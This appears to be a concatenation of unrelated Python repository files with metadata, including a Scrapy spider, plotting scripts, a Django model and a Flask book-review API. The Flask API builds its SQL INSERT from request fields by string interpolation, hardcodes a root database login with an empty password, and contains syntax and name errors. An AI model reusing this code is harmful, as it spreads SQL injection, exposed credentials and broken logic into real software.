a2.c = a2.signal.connect( Gaffer.WeakMethod( a2.ff ) )
self.assertEqual( a2.signal( a2 ), True )
w = weakref.ref( a2 )
self.assert_( w() is a2 )
del a2
self.assertEqual( w(), None )
def tearDown( self ) :
self.__widget = None
GafferUITest.TestCase.tearDown( self )
if __name__ == "__main__":
unittest.main()
|
[
"thehaddonyoof@gmail.com"
] |
thehaddonyoof@gmail.com
|
29c05be213a365da1ca935d1295d2c2a2962abe5
|
f6c0eb27a3a8e93e8d0f38d105e584af826753c4
|
/00_3DVector_11.py
|
8b2a49a21382a0a9b25c40d144b8e6d5a1d7e417
|
[] |
no_license
|
UW-ParksidePhysics/Nicolas.Alexis
|
63e38096595a01780d1baf3b1c6ea94c70485c0f
|
64b34f02a96a72925168cf9d682b4ebe220520ae
|
refs/heads/master
| 2020-12-28T11:01:22.965307
| 2020-05-14T22:28:57
| 2020-05-14T22:28:57
| 238,303,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,274
|
py
|
from vpython import *
scene.background = color.white
scene.width = 600
scene.height = 600
scene.forward = vector(-.5, -.3, -1)
scene.caption = """To rotate "camera", drag with right button or Ctrl-drag.
To zoom, drag with middle button or Alt/Option depressed, or use scroll wheel.
On a two-button mouse, middle is left + right.
To pan left/right and up/down, Shift-drag.
Touch screen: pinch/extend to zoom, swipe or two-finger rotate."""
x_axis = cylinder(color=vector(1, 0, 0), pos=vector(0, 0, 0), axis=vector(10, 0, 0), radius=0.3)
x_lbl = label(pos=vector(11, 0, 0), text="x-axis", color=color.red, opacity=0, height=30, box=0)
y_axis = cylinder(color=color.green, pos=vector(0,0,0), axis=vector(0,10,0), radius=0.3)
y_lbl = label(pos=vector(0, 11, 0), text="y-axis", color=color.green, opacity=0, height=30, box=0)
z_axis = cylinder(color=color.blue, pos=vector(0, 0, 0), axis=vector(0, 0, 10), radius=0.3)
z_lbl = label(pos=vector(0, 0, 11), text="z-axis", color=color.blue, opacity=0, height=30, box=0)
birthday_axis = cylinder(color=color.yellow, pos=vector(0, 0, 0), axis=vector(4, 8, 11), radius=0.3)
birthday_lbl = label(pos=vector(5, 9, 12), text="birthday vector", color=color.yellow, opacity=0, height=30, box=0)
#day day month
|
[
"noreply@github.com"
] |
UW-ParksidePhysics.noreply@github.com
|
41b6c957f60424a66ad4720591bfc07fd731a89a
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/carbon/common/script/net/GPSExceptions.py
|
f6085187795282172e0abadcda9083aae107424c
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529
| 2016-10-19T08:56:26
| 2016-10-19T08:56:26
| 71,334,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,541
|
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\script\net\GPSExceptions.py
import blue
import eve.common.script.net.eveMachoNetVersion as eveMachoVersion
import exceptions
class GPSException(StandardError):
__guid__ = 'exceptions.GPSException'
def __init__(self, *args):
super(GPSException, self).__init__(*args)
self.reason = args[0] if args else None
def __repr__(self):
return '<%s: reason=%r, args[1:]=%r>' % (self.__class__.__name__, self.reason, self.args[1:])
class GPSTransportClosed(GPSException):
__guid__ = 'exceptions.GPSTransportClosed'
def __init__(self, reason = None, reasonCode = None, reasonArgs = {}, machoVersion = None, version = None, build = None, codename = None, region = None, origin = None, loggedOnUserCount = None, exception = None):
args = (reason, exception) if exception else (reason,)
super(GPSTransportClosed, self).__init__(*args)
self.machoVersion = machoVersion or eveMachoVersion.machoVersion
self.version = version or boot.version
self.build = build or boot.build
self.codename = str(codename or boot.codename)
self.region = str(region or boot.region)
self.loggedOnUserCount = loggedOnUserCount or 'machoNet' in sm.services and sm.services['machoNet'].GetClusterSessionCounts('EVE:Online')[0]
self.origin = origin or boot.role
self.clock = blue.os.GetWallclockTimeNow()
self.reasonCode = reasonCode
self.reasonArgs = reasonArgs
def GetCloseArgs(self):
args = {'reason': getattr(self, 'reason', None),
'reasonCode': getattr(self, 'reasonCode', None),
'reasonArgs': getattr(self, 'reasonArgs', None),
'exception': self}
return args
class GPSRemoteTransportClosed(GPSTransportClosed):
__guid__ = 'exceptions.GPSRemoteTransportClosed'
class GPSBadAddress(GPSException):
__guid__ = 'exceptions.GPSBadAddress'
class GPSAddressOccupied(GPSException):
__guid__ = 'exceptions.GPSAddressOccupied'
import __builtin__
__builtin__.GPSException = GPSException
__builtin__.GPSTransportClosed = GPSTransportClosed
__builtin__.GPSBadAddress = GPSBadAddress
__builtin__.GPSAddressOccupied = GPSAddressOccupied
exceptions.GPSException = GPSException
exceptions.GPSRemoteTransportClosed = GPSRemoteTransportClosed
exceptions.GPSTransportClosed = GPSTransportClosed
exceptions.GPSBadAddress = GPSBadAddress
exceptions.GPSAddressOccupied = GPSAddressOccupied
|
[
"le02005@163.com"
] |
le02005@163.com
|
c58d67fbc013e1dd1dc6694f56b280bb6ce809ec
|
6713372c2c86e766a80f440b441673ba232bc649
|
/jcsalesweb/jcsalesweb/spiders/built.py
|
494ba102178465301903840a9977e75fb7212b39
|
[] |
no_license
|
rahul-keshav/zech-all-python-scrapers
|
3e0c98d69a036468dd49e1763de0c2f54486cc83
|
1576738c4f34d08c29d97145f43c343da8400d70
|
refs/heads/main
| 2023-03-03T15:19:10.523293
| 2021-02-17T16:55:05
| 2021-02-17T16:55:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,785
|
py
|
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
class BuiltSpider(CrawlSpider):
name = 'built'
allowed_domains = ['www.jcsalesweb.com']
start_urls = ['https://www.jcsalesweb.com/']
rules = (
Rule(LinkExtractor(restrict_xpaths='//li[@class="nav-category-item"]/a'), follow=True),
Rule(LinkExtractor(restrict_xpaths='//div[@class="display-label product-name"]/a'), callback = 'parse_item', follow=True),
Rule(LinkExtractor(restrict_xpaths='(//a[@class="page-nav-label"])[2]'), follow=True),
)
def parse_item(self, response):
title = response.xpath('//h2/text()').get()
item_no = response.xpath('normalize-space(//div[@style="margin-top: 4px; font-size: 17px; font-weight: bold; color: #103972;"]/text())').get()
country_of_origin = response.xpath('normalize-space(//div[contains(text(),"Country of Origin")]/text())').get()
barcode = response.xpath('normalize-space(//div[contains(text(),"Barcode")]/text()[2])').get()
desc = response.xpath('normalize-space(//div[@class="product-umdescription"]/text())').get()
image = response.xpath('//div[@class="image"]/a[@class="dispaly-large-image"]/@href').get()
price = response.xpath('normalize-space(//span[@class="display-label each-price"]/text())').get()
pack_price = response.xpath('normalize-space(//span[@class="pack-price"]/text())').get()
yield{
'title':title,
'item_no':item_no,
"Country of Origin":country_of_origin,
'barcode':barcode,
'Description':desc,
'image':image,
'price':price,
'pack_price':pack_price,
'url':response.url
}
|
[
"rr916122@gmail.com"
] |
rr916122@gmail.com
|
26f64a83d5cd89221d7f1665dc549ffb54fdaa11
|
9b722ca41671eb2cea19bac5126d0920639261bd
|
/.history/app_20201124130253.py
|
b87b9dad2453eba605fff3c3a7ef82b879f9ac2b
|
[] |
no_license
|
thawalk/db_flask_server
|
7928fd481f99d30bdccc60d97f02db78324cfdbe
|
cd55f1c9bf84c734457ee02d9f64a6833e295fad
|
refs/heads/master
| 2023-01-25T02:40:19.097457
| 2020-12-06T07:45:50
| 2020-12-06T07:45:50
| 314,229,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,691
|
py
|
import json
import pymongo
from flask import Flask, jsonify, url_for, request, redirect,Response,Request
import pymongo
from bson.json_util import dumps
import mysql.connector
from werkzeug.serving import run_simple
import os
from dotenv import load_dotenv
import datetime
import time
app = Flask(__name__)
test_collection='test_collection'
mongo = pymongo.MongoClient('mongodb://54.83.130.150:27017/?readPreference=primary&appname=MongoDB%20Compass&ssl=false')
db = pymongo.database.Database(mongo, 'test')
metadata_col = pymongo.collection.Collection(db, 'test_collection')
db = mysql.connector.connect(
host ='3.84.158.241',
user = 'root',
password = '',
database = 'reviews',
)
cur = db.cursor()
@app.route('/',methods=["GET"])
def api_root():
data = {
'message': 'Welcome to our website. Where reviews are our number one priority'
}
js = json.dumps(data)
response = Response(js, status=200, mimetype='application/json')
return response
@app.route('/categories', methods = ['GET']) #TODO: #returns list of categories
def get_categories():
categories = []
js = json.dumps(data)
response = Response(js, status=200, mimetype='application/json')
return response
@app.route('/search', methods=['GET']) #now it only searches for TITLE. the mongo metadata does not have author
def search_book():
try:
data = request.json
title = data["title"]
result = metadata_col.find({"title":title})
result_array = dumps(list(result))
print(result_array)
js = json.dumps(result_array)
response = Response(js, status=200, mimetype='application/json')
return response
except:
errMsg = "Please include title."
js = json.dumps(errMsg)
response = Response(js, status=400, mimetype='application/json')
return response
# @app.route('/review', methods=['POST'])
# def add_review():
# if not request.json or not request.json['asin'] or type(request.json['asin']) != str or not request.json['overall'] or not request.json['reviewText'] or type(request.json['reviewText']) != str or not request.json['reviewTime'] or type(request.json['reviewTime']) != str or not request.json['reviewerID'] or type(request.json['reviewerID']) != str or not request.json['reviewerName'] or type(request.json['reviewerName']) != str or not request.json['summary'] or type(request.json['summary']) != str or not request.json['unixReviewTime'] or type(request.json['unixReviewTime']) != int :
# return 'invalid request msg', 404
# txt = "INSERT INTO 'kindle_reviews' ('id', 'asin', 'overall', 'reviewText', 'reviewTime', 'reviewerID', 'reviewerName', 'summary', 'unixReviewTime') VALUES (%s)"
# values = (None, request.json['asin'], request.json['overall'], request.json['reviewText'], request.json['reviewTime'], request.json['reviewerID'], request.json['reviewerName'], request.json['summary'], request.json['unixReviewTime'])
# cur.execute(txt, values)
# return 'successfully uploaded new review', 200
@app.route('/addBook',methods= ['POST'])
def add_book():
# if not request.json or not request.json['asin'] or type(request.json['asin']) != str or not request.json['overall'] or not request.json['reviewText'] or type(request.json['reviewText']) != str or not request.json['reviewTime'] or type(request.json['reviewTime']) != str or not request.json['reviewerID'] or type(request.json['reviewerID']) != str or not request.json['reviewerName'] or type(request.json['reviewerName']) != str or not request.json['summary'] or type(request.json['summary']) != str or not request.json['unixReviewTime'] or type(request.json['unixReviewTime']) != int :
# return 'invalid request msg', 404
try:
data = request.json
title = data['title']
asin = data['asin']
description = data['description']
price = data['price']
categories = data['categories']
message = "Book added successfully"
metadata_col.insert({"title":title,"asin":asin,"description":description,"price":price,"categories":categories})
js = json.dumps(message)
response = Response(js, status=201, mimetype='application/json')
return response
except:
errMsg = "Please include title, asin, description, price and categories."
js = json.dumps(errMsg)
response = Response(js, status=400, mimetype='application/json')
return response
@app.route('/addReview',methods = ['POST']) #TODO: add review INTO sql part
def add_review():
try:
data = request.json
asin = data["asin"]
helpful = [0,0]
overall = data["overall"]
reviewText = data["reviewText"]
reviewTime = data["reviewTime"]
reviewerID = data["reviewerID"]
reviewerName = data["reviewerName"]
summary = data["summary"]
unixReviewTime = int(time.time())
mySQL_insert_query = f"""INSERT INTO reviews.kindle_reviews (asin, helpful, overall, reviewText, reviewTime, reviewerID, reviewerName, summary, unixReviewTime)
VALUES ("{asin}","{helpful}",{overall},"{reviewText}","{reviewTime}","{reviewerID}","{reviewerName}","{summary}","{unixReviewTime}");"""
cur.execute(mySQL_insert_query)
db.commit()
message = "Successfully uploaded review"
js = json.dumps(message)
response = Response(js, status=201, mimetype='application/json')
return response
except:
errMsg = "An error occurred. Please check if you have all fields."
js = json.dumps(errMsg)
response = Response(js, status=400, mimetype='application/json')
return response
@app.route('/sortByGenres', methods= ['GET']) #TODO: sort by genres from mongo metadata categories
def sort_by_genres():
pass
@app.route('/sortByRating' , methods = ['GET'])
def sort_by_ratings(): #sort by increasing ratings, decreasing rating
try:
data = request.json
rating_preference = data['rating_preference']
if(rating_preference = 'increasing'): #means rating 1 will come out first
mySQL_sort_query = """SELECT * FROM reviews.kindle_reviews ORDER BY overall ASC LIMIT 10;"""
cur.execute(mySQL_sort_query)
result_set = cursor.fetchall()
except:
errMsg = "An error occurred. Please check if you have all fields."
js = json.dumps(errMsg)
response = Response(js, status=400, mimetype='application/json')
return response
if __name__ == '__main__':
# app.run(host="0.0.0.0", port=80) #remember to change this part
app.run(debug=True)
|
[
"akmal_hakim_teo@hotmail.com"
] |
akmal_hakim_teo@hotmail.com
|
1abec2b264b95150cd3bd58187b7e71b6269d40a
|
8616892b6541602b53fdd94d1552d8e96b7ab722
|
/dessn/investigations/zeropoints/__init__.py
|
431f70a613cbef2e8ba27f431334a7a83058d136
|
[
"MIT"
] |
permissive
|
dessn/sn-bhm
|
7c436877832ec10e4af318a6befff9fb8ffcbf3a
|
f320a41f9a4f2be49073437e98addca79e938160
|
refs/heads/master
| 2020-08-28T03:34:38.180148
| 2019-05-01T04:23:23
| 2019-05-01T04:23:23
| 45,723,864
| 1
| 0
| null | 2017-04-25T02:54:43
| 2015-11-07T05:27:44
|
Python
|
UTF-8
|
Python
| false
| false
| 2,272
|
py
|
r"""
A fully rigorous analysis would be expected to integrate zero point
uncertainty and covariance by having the conversion between counts
and flux. However, this is numerically infeasible, as there are so
many observational effects that must be included to get the actual
flux and flux error. Because of this, zero point uncertainty is
generally propagated into analysis by determining the numerical
derivative of the parameters of interest (generally apparent magnitude,
stretch and colour of the supernovae) with respect to the zero points
by simulations. In doing this, there is an assumption made about the
linearity of the gradient surface.
For our DES-like data sample, we find that numerical derivatives
remain linear on scales exceeding :math:`5\sigma`, and so utilise this method
like previous analyses.
As normal, we take a base light curve, and then - for each band we have -
we shift the flux and flux error for those observations lke we had perturbed
the zero point, and compare the difference in SALT2 fit summary statistics
between the base light curve and the perturbed light curve.
With typical zero point uncertainty estimated to be of the order of :math:`0.01` mag,
we calculate numerical derivatives using that :math:`\delta Z_b = 0.01`. Identical results were
used found when using :math:`\delta Z_b = 0.05` and when using either Newton's
difference quotient or symmetric difference quotient.
Using several thousand supernova and simulating an underlying population
which has dispersion in magnitude, stretch and colour, we produce the following
plot.
.. figure:: ../dessn/investigations/zeropoints/output/sensitivity.png
:align: center
:width: 60%
The lighter and more disperse colours show the numerical gradients I
have calculated. The darker, tighter and discontinuous lines are
gradients Chris Lidman has calculated (using canonical supernova). Whilst
he is using DES observations and I assume fixed cadence, the disparity
between the curves is a concern and needs to be figured out. I should note
that the underlying population I draw from is not the issue here - I still have
many times his dispersion when I collapse my underlying supernova population
into a delta function.
"""
|
[
"samuelreay@gmail.com"
] |
samuelreay@gmail.com
|
6e15047fc8b42f8993d0c2fa8ea6535776a3d0a1
|
ded0c895f6e1f8853f2222ae498bdc7ae52ef0e4
|
/week-03/week03/fit_es9_bodediag_g500.py
|
52b0261c3feb10d4a04ae9a37b493ba89d270a4d
|
[] |
no_license
|
LorenzoLMP/TD2015
|
6a8846b4592b32db81338b8522a10a2dc52531c1
|
e39b51d48149d07c3cea682a02eeec4e69ffbabd
|
refs/heads/master
| 2021-01-17T14:47:20.378339
| 2016-05-31T11:33:50
| 2016-05-31T11:33:50
| 43,302,288
| 0
| 0
| null | 2015-09-28T13:58:46
| 2015-09-28T13:23:45
| null |
UTF-8
|
Python
| false
| false
| 2,208
|
py
|
from pylab import *
from scipy import *
from scipy import optimize
from scipy import misc
data = genfromtxt('es9_500_buono')
f = data[:,0]
guad = data[:,1]
sfasa = data[:,2]
xdata = f
ydata = guad
zdata = sfasa
#sigmax = data [:,3]
#sigmay = data [:,4]
for k in range (len(zdata)):
zdata[k]=zdata[k] - 0.0006*xdata[k]
#########################################
sigmay = []
i = 0
while i < len(ydata):
t = max(0.03/100, 2*sqrt(2)*0.002)
w = sqrt( t**2 + 0.005/(ydata[i]*0.1) )
sigmay.append(w)
i = i+1
sigmay = array(sigmay)
sigmax = []
i = 0
while i < len(xdata):
s = max(0.040, xdata[i]*5*10**(-5))
sigmax.append(s)
i = i +1
sigmax = array(sigmax)
##############################################
rc('font', size=15)
#xlabel(r'$frequenza [Hz]$')
#ylabel(r'$Gain $')
minorticks_on()
#Attivare per scala bilog
#xscale('log')
#yscale('log')
#xlim(80,30000)
#ylim(35,103)
############################################################
#Parte per plot dati
#grid('on', which = "both")
#title("Bode Diagram Gain-Phase", size = 15)
#plot(xdata, ydata, linestyle="None",marker=".", color="black", markersize= 10)
subplot(2, 1, 1)
title("Bode Diagram Gain-Phase G500", size = 15)
errorbar(xdata, ydata, sigmay, sigmax, linestyle="None", color="black")
xscale('log')
xlim(100,10000)
#xlabel(r'$frequenza [Hz]$')
ylabel(r'$Gain $')
grid('on', which = "both")
freq_tagl = r'$f_{C} = 1.64 \pm 0.04 kHz $'
text(xdata.min()*1.5, 300, freq_tagl, family='serif', style='italic', size=15)
gain = r'$G = 540 \pm 2 $'
text(xdata.min()*1.5, 200, gain, family='serif', style='italic', size=15)
prod = r'$G*f_{C} = (887 \pm 30) kHz $'
text(xdata.min()*1.5, 100, prod, family='serif', style='italic', size=15)
#savefig('C:\Python33\Fuso\filtro_RC\grafico1.png', dpi=200)
################################################################
subplot(2,1,2)
plot(xdata, zdata, linestyle="None",marker=".", color="black", markersize= 6)
#errorbar(xdata, zdata, linestyle="None", color="black")
xscale('log')
xlabel(r'$frequenza [Hz]$')
#xlim(80,30000)
ylabel(r'$Sfasamento $')
grid('on', which = "both")
savefig('es_9_bode_g500.png', dpi=400)
show()
|
[
"lorenzo.perrone.lmp@gmail.com"
] |
lorenzo.perrone.lmp@gmail.com
|
3e5cd7fd66923a6dfbc3094447a16059ab09184f
|
0adf94fc39a02018165b62e93dd83edddd041230
|
/.history/Jobs/models_20190223175917.py
|
16e73071aaf08e851f1634fc3c30a492187135df
|
[] |
no_license
|
SabitDeepto/BrJobs
|
1e3baa143331cf46b9c70911c6644d1efd4fffd6
|
1a458c8c667f8093a2325d963e5542655467c7aa
|
refs/heads/master
| 2020-04-24T08:02:26.350007
| 2019-03-17T05:53:30
| 2019-03-17T05:53:30
| 171,818,024
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,436
|
py
|
from django.db import models
from django.utils.text import slugify
# Create your models here.
class JobPost(models.Model):
title_1 = models.CharField(max_length=100, null=True, blank=True)
subtitle_1 = models.CharField(max_length=150, null=True, blank=True)
title_2 = models.CharField(max_length=100, null=True, blank=True)
subtitle_2 = models.CharField(max_length=150, null=True, blank=True)
slug = models.SlugField(null=True, blank=True, help_text="Slug will be generated automatically from the title_2 of the post")
button = models.CharField(max_length=30, null=True, blank=True)
heading_1 = models.CharField(max_length=100, null=True, blank=True)
heading_2 = models.CharField(max_length=100, null=True, blank=True)
description = models.TextField(null=True, blank=True)
l_image = models.ImageField(upload_to="solution", help_text="top left image", null=True, blank=True)
r_image = models.ImageField(upload_to="solution", help_text="top right image", null=True, blank=True)
m_image = models.ImageField(upload_to="solution", help_text="your main image", null=True, blank=True)
last_3_digit = models.IntegerField(null=True)
transaction_id = models.IntegerField(null=True)
date = models.DateTimeField(auto_now_add=True)
gender_choice = (
('done', 'DONE'),
('pending', 'PENDING'),
)
status = models.CharField(choices=gender_choice, max_length=200)
|
[
"deepto69@gmail.com"
] |
deepto69@gmail.com
|
8534ba19ac8b1dbb98e26204edaffc27a8b3f144
|
ea008627679802814b0ff8bcd91449af63348337
|
/lib/exabgp/bgp/message/open/routerid.py
|
f2db32231b684f6f493245fa86788d9d65c8ecd6
|
[
"BSD-3-Clause"
] |
permissive
|
vbancroft/exabgp
|
aaab88ce5f1d0be94caa9381100cfba9e48043c2
|
4e6b88248e536b83b88e1d5df395048adc292fc0
|
refs/heads/master
| 2021-01-16T00:10:26.083063
| 2014-01-22T15:18:16
| 2014-01-22T15:18:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
# encoding: utf-8
"""
routerid.py
Created by Thomas Mangin on 2012-07-17.
Copyright (c) 2009-2013 Exa Networks. All rights reserved.
"""
from exabgp.protocol.ip.inet import Inet,inet
# =================================================================== RouterID
class RouterID (Inet):
def __init__ (self,ipv4):
Inet.__init__(self,*inet(ipv4))
|
[
"thomas.mangin@exa-networks.co.uk"
] |
thomas.mangin@exa-networks.co.uk
|
39fc66bf10c68f9c87ae44bb546889ae81b955fc
|
cbfb679bd068a1153ed855f0db1a8b9e0d4bfd98
|
/learning_material/nonlocal_vs_global.py
|
e6d9bb0ab5431b381a63b5c864ee458c3e4b0629
|
[] |
no_license
|
arsamigullin/problem_solving_python
|
47715858a394ba9298e04c11f2fe7f5ec0ee443a
|
59f70dc4466e15df591ba285317e4a1fe808ed60
|
refs/heads/master
| 2023-03-04T01:13:51.280001
| 2023-02-27T18:20:56
| 2023-02-27T18:20:56
| 212,953,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
class NonLocalVsGlobal:
def testNonLocal(self):
# this works
res = []
var = 0
for i in range(5):
var+=1
res.append(var)
print(var,res)
def helper():
#nonlocal var, res # without nonlocal this code throws an error
if var == 10:
return
print(var)
#res+=[108]
res.append(var)
helper()
print(var,res)
if __name__ == "__main__":
s=NonLocalVsGlobal()
s.testNonLocal()
|
[
"ar.smglln@gmail.com"
] |
ar.smglln@gmail.com
|
a5eea522f46af7faf91c63b7568dc49fe71b3aad
|
e2cc296dc3627242e56cd6f0a08f1e0dd8214eb2
|
/src/app/routers/geo.py
|
e6289796b70b78b03c05ec6185238c703f8fbf6a
|
[
"MIT"
] |
permissive
|
trivedisorabh/fastapi-tile38
|
b7604d0f90261b30fa1559de50742d2ab0192dd0
|
878e74211cfa3fc0a0e55c68aeaae5b2822a9a4d
|
refs/heads/main
| 2023-07-16T06:26:59.794998
| 2021-09-03T11:09:49
| 2021-09-05T13:30:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,518
|
py
|
from typing import Optional
from fastapi import APIRouter, status
from pyle38.responses import ObjectsResponse
from app.db.db import tile38
from app.models.vehicle import VehiclesResponse, Vehicle
router = APIRouter()
@router.get(
"/search/within",
response_model=VehiclesResponse,
response_model_exclude_none=True,
tags=["geo-search"],
status_code=status.HTTP_200_OK,
)
async def get_within(lat: float, lon: float, radius: float) -> VehiclesResponse:
vehicles: ObjectsResponse[Vehicle] = (
await tile38.within("fleet").circle(lat, lon, radius).asObjects()
)
response = {"data": vehicles.objects}
return VehiclesResponse(**response)
@router.get(
"/search/nearby",
response_model=VehiclesResponse,
response_model_exclude_none=True,
tags=["geo-search"],
status_code=status.HTTP_200_OK,
)
async def get_nearby(
lat: float, lon: float, radius: Optional[int] = None
) -> VehiclesResponse:
if radius:
vehicles_in_radius: ObjectsResponse[Vehicle] = (
await tile38.nearby("fleet")
.point(lat, lon, radius)
.distance()
.nofields()
.asObjects()
)
response = {"data": vehicles_in_radius.objects}
return VehiclesResponse(**(response))
vehicles: ObjectsResponse[Vehicle] = (
await tile38.nearby("fleet").point(lat, lon).distance().nofields().asObjects()
)
response = {"data": vehicles.objects}
return VehiclesResponse(**(response))
|
[
"legionaerr@googlemail.com"
] |
legionaerr@googlemail.com
|
11e1f3fefec856c167d3df43e987a3f0636810ca
|
7275f7454ce7c3ce519aba81b3c99994d81a56d3
|
/sp1/python全栈/面向对象编程/面向对象进阶_用的较少/item_setitem_getitem_delitem.py
|
f0f215284ad925f208c9887c93688877a6c8cf0b
|
[] |
no_license
|
chengqiangaoci/back
|
b4c964b17fb4b9e97ab7bf0e607bdc13e2724f06
|
a26da4e4f088afb57c4122eedb0cd42bb3052b16
|
refs/heads/master
| 2020-03-22T08:36:48.360430
| 2018-08-10T03:53:55
| 2018-08-10T03:53:55
| 139,777,994
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 501
|
py
|
#.系列跟attr相关,字典的形式跟item相关
class Foo():
def __getitem__(self,item):
print("getitem",item)
return self.__dict__[item]
def __setitem__(self,key,value):
print("setitem")
self.__dict__[key] = value
def __delitem__(self,key):
print("delitem")
self.__dict__.pop(key)
f1 = Foo()
#item只适用于字典的复制方式,如下,但是f.name = xxx这种方式不行
f1["name"] = "chengqian"#可以这样定义属性,直接触发setitem方法
print(f1.__dict__)
|
[
"2395618655@qq.com"
] |
2395618655@qq.com
|
34510fbd0abc39f92acaa541a2f90739c91ea04e
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/8/usersdata/82/5616/submittedfiles/imc.py
|
e7a67c5946b587d937599ef4547dabde0603ba36
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
#ENTRADA
input ('Digite o peso em kg:')
input ('Digite a altura em m:')
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
78f34811ef30c2bf8f1ea658d1940d31e99bfc2c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03409/s009547143.py
|
278737b03d5d70ba2b2f2aa87be5f575a51bf731
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 620
|
py
|
from collections import defaultdict
n = int(input())
cnt = 0
dic = defaultdict(list)
ab = []
cd = []
for i in range(n):
a, b = map(int, input().split())
ab.append((a, b))
for i in range(n):
c, d = map(int, input().split())
cd.append((c, d))
for i in ab:
for j in cd:
a, b = i
c, d = j
if a < c and b < d:
dic[i].append(j)
seen = set()
for key, value in sorted(dic.items(), key=lambda x: x[0][1], reverse=True):
for co in sorted(value, key=lambda x: x[0]):
if co not in seen:
cnt += 1
seen.add(co)
break
print(cnt)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
fed7951cee22cfc9c0882716080ae3b260d36460
|
3292017df3ff6c7190d5c5a60ecf5f8936cb7b90
|
/checkio/Ice Base/Colder-Warmer/test_colder_warmer.py
|
24974220ee88c2a77c726aa4a95705ec00bb272b
|
[
"MIT"
] |
permissive
|
KenMercusLai/checkio
|
1e9cdfe70ccaf5315db36391c4710533d99cf9aa
|
5082ab0c6a7ae2d97963568a6f41589332e88029
|
refs/heads/master
| 2022-05-12T18:22:22.604531
| 2022-05-11T09:00:28
| 2022-05-11T09:00:28
| 22,260,056
| 39
| 22
|
NOASSERTION
| 2022-05-11T08:42:05
| 2014-07-25T14:40:06
|
Python
|
UTF-8
|
Python
| false
| false
| 1,364
|
py
|
import unittest
from math import hypot
from colder_warmer import checkio
MAX_STEP = 12
def check_solution(func, goal, start):
prev_steps = [start]
for step in range(MAX_STEP):
row, col = func([s[:] for s in prev_steps])
if [row, col] == goal:
return True
if 10 <= row or 0 > row or 10 <= col or 0 > col:
print("You gave wrong coordinates.")
return False
prev_distance = hypot(prev_steps[-1][0] - goal[0], prev_steps[-1][1] - goal[1])
distance = hypot(row - goal[0], col - goal[1])
alteration = (
0 if prev_distance == distance else (1 if prev_distance > distance else -1)
)
prev_steps.append([row, col, alteration])
print("Too many steps")
return False
class Tests(unittest.TestCase):
TESTS = {
"1st": {"input": [[5, 5, 0]], "goal": [7, 7]},
"2nd": {"input": [[0, 0, 0]], "goal": [5, 6]},
"3rd": {"input": [[0, 0, 0]], "goal": [9, 9]},
"4th": {"input": [[7, 7, 0]], "goal": [2, 4]},
"5th": {"input": [[0, 9, 0]], "goal": [9, 0]},
}
def test_Basics(self):
for i in self.TESTS:
assert check_solution(
checkio, self.TESTS[i]['goal'], self.TESTS[i]['input'][0]
)
if __name__ == "__main__": # pragma: no cover
unittest.main()
|
[
"ken.mercus.lai@gmail.com"
] |
ken.mercus.lai@gmail.com
|
1568ef74cc5f8f1613a48d6d9899b608ab2d8575
|
499bc17d5cdfec023b9897fe8510c18c67432d70
|
/ibms_project/sfm/migrations/0007_costcentre_region.py
|
97b1bf8247f13b78917ecf76f0da243b0d895269
|
[
"Apache-2.0"
] |
permissive
|
ropable/ibms
|
952348fb44b7be6d2ee5722b3f3dc40eb42f6e35
|
fbfb4e85586bc7409d2abc3cfd51380b7f1f59d3
|
refs/heads/master
| 2023-08-31T22:21:19.050078
| 2023-08-24T04:48:36
| 2023-08-24T04:48:36
| 49,852,305
| 1
| 0
|
Apache-2.0
| 2020-08-13T01:09:55
| 2016-01-18T04:36:48
|
Python
|
UTF-8
|
Python
| false
| false
| 652
|
py
|
# Generated by Django 3.2.4 on 2021-08-23 01:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sfm', '0006_sfmmetric_region'),
]
operations = [
migrations.AddField(
model_name='costcentre',
name='region',
field=models.CharField(blank=True, choices=[('Goldfields', 'Goldfields'), ('Kimberley', 'Kimberley'), ('Midwest', 'Midwest'), ('Pilbara', 'Pilbara'), ('South Coast', 'South Coast'), ('South West', 'South West'), ('Swan', 'Swan'), ('Warren', 'Warren'), ('Wheatbelt', 'Wheatbelt')], max_length=100, null=True),
),
]
|
[
"ashley@ropable.com"
] |
ashley@ropable.com
|
61c9b945b3814e8d0d8bae8207a4e3d8c13e36e3
|
152b74ed7d60d75a9d70f6637c107fff9b064ff9
|
/Chapter08/Testing Adversarial-Robustness of Neural Networks/abs_models/visualization.py
|
